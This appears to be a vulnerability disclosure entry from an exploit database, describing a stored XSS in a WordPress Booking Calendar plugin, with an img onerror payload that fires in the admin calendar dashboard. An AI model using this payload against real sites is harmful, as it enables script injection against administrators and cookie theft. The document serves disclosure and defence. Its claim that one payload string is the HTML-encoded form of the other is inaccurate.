Share
## https://sploitus.com/exploit?id=WPEX-ID:084E9494-2F9E-4420-9BF7-78A1A41433D7
As an unauthenticated user, submit a booking form (such form can be added via the Booking Calendar Block on a page/post) with the payload below in the First or Last Name field:

"><img src=1 onerror="javascript:alert(document.cookie)"></img>

Which is the HTML encoded of ><img src=1 onerror="javascript:alert(document.cookie)"></img>


The XSS will be triggered when an admin will access the calendar overview dashboard (ie /wp-admin/admin.php?page=wpbc&view_days_num=90&view_mode=vm_calendar)